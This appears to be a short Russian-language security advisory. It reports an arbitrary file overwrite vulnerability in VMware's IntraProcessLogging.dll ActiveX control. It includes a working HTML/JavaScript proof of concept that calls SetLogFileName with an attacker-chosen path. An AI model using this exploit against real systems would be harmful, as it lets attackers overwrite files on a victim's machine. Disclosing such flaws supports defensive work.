Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: VMware IntraProcessLogging.dll 5.5.3.42958
Найденная уязвимость позволяет перезаписать произвольные файлы на целевой системе. Уязвимость существует из-за ошибки в проверке входных данных в IntraProcessLogging.dll. Атакующий может перезаписать произвольные файлы на целевой системе.
Пример:
<HTML> <BODY> <object id=ctrl classid="clsid:{AF13B07E-28A1-4CAC-9C9A-EC582E354A24}"></object> <SCRIPT> function Do_it() { File = "c:\\arbitrary_file.txt" ctrl.SetLogFileName(File) } </SCRIPT> <input language=JavaScript onclick=Do_it() type=button value="Proof of Concept"> </BODY> </HTML>